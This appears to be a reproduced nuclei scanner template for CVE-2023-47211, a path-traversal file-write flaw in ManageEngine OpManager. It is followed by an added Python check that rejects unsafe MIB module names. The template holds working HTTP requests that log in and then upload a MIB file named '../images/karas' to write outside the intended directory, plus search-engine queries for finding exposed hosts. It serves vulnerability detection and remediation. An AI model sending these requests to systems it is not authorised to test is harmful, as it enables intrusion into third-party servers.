ManageEngine OpManager - Directory Traversal

03 Jul 2026 03:01:05 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

ManageEngine OpManager - Directory Traversal vulnerability allows arbitrary file creation via specially crafted HTTP reques

id: CVE-2023-47211

info:
  name: ManageEngine OpManager - Directory Traversal
  author: gy741
  severity: high
  description: |
    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
  impact: |
    Unauthenticated attackers can write arbitrary files to the system via path traversal, potentially creating backdoors or compromising system integrity.
  remediation: |
    Update ManageEngine OpManager to version 12.7.259 or later.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-47211
    cwe-id: CWE-22
    epss-score: 0.47024
    epss-percentile: 0.98688
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_firewall_analyzer
    shodan-query:
      - "http.title:\"OpManager Plus\""
      - http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp,vuln

http:
  - raw:
      - |
        POST /two_factor_auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN


        IMPORTS
            enterprises
                FROM RFC1155-SMI;

        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
        software        OBJECT IDENTIFIER ::= { microsoft 1 }
        systems         OBJECT IDENTIFIER ::= { software 1 }
        os              OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
        windows         OBJECT IDENTIFIER ::= { os 2 }
        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }

        END

        -----------------------------372334936941313273904263503262--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "MIBFile with same name already exists")'
        condition: and

    extractors:
      - type: regex
        name: x_zcsrf_token
        group: 1
        part: header
        regex:
          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
        internal: true
# digest: 4a0a00473045022100c41f6b9727c16b2ac2fe024a4711609142b90469db9e0489f7896e93671f994e022028d544bdfbbd4a18ce0454cfa22597f72dd3d9723805b6470af62f24a5f48db0:922c64590222798bb761d5b6d8e72950
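
The upload body in the template puts `../images/karas` where a MIB module name belongs. The following is an added example, not part of the template or of OpManager's code: a server-side check that parses the module name and refuses anything that could steer a file path. It assumes, as the payload suggests, that the stored file name is derived from the module name; `check_upload`, `module_name` and the base directory `/opt/example/mibs` are hypothetical names.

```python
import posixpath
import re

# The token immediately before "DEFINITIONS ::= BEGIN" is the MIB module name.
HEADER = re.compile(r"^\s*(\S+)\s+DEFINITIONS\s*::=\s*BEGIN", re.MULTILINE)
# Letters, digits and hyphens only: no dots, slashes or backslashes.
SAFE_NAME = re.compile(r"[A-Za-z][A-Za-z0-9-]{0,63}")

# Header line taken from the template's upload body (shortened), and a
# constructed benign MIB for comparison.
TEMPLATE_BODY = (
    "../images/karas DEFINITIONS ::= BEGIN\n"
    "IMPORTS\n    enterprises\n        FROM RFC1155-SMI;\nEND\n"
)
BENIGN_BODY = (
    "EXAMPLE-MIB DEFINITIONS ::= BEGIN\n"
    "IMPORTS\n    enterprises\n        FROM RFC1155-SMI;\nEND\n"
)


def module_name(mib_text):
    """Return the module name from the MIB header, or None if there is none."""
    match = HEADER.search(mib_text)
    return match.group(1) if match else None


def check_upload(mib_text, base_dir="/opt/example/mibs"):
    """Return (accepted, detail): detail is the storage path or the reason."""
    name = module_name(mib_text)
    if name is None:
        return False, "no module header found"
    if not SAFE_NAME.fullmatch(name):
        return False, "module name rejected: %r" % name
    # Defence in depth: the normalised target must stay under base_dir.
    target = posixpath.normpath(posixpath.join(base_dir, name))
    if posixpath.commonpath([base_dir, target]) != base_dir:
        return False, "target escapes base directory"
    return True, target


if __name__ == "__main__":
    for label, body in (("template body", TEMPLATE_BODY), ("benign", BENIGN_BODY)):
        print(label, check_upload(body))
```

The same `module_name` parse can be run over stored or logged `uploadMib` bodies to flag earlier uploads whose module name contains path characters.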
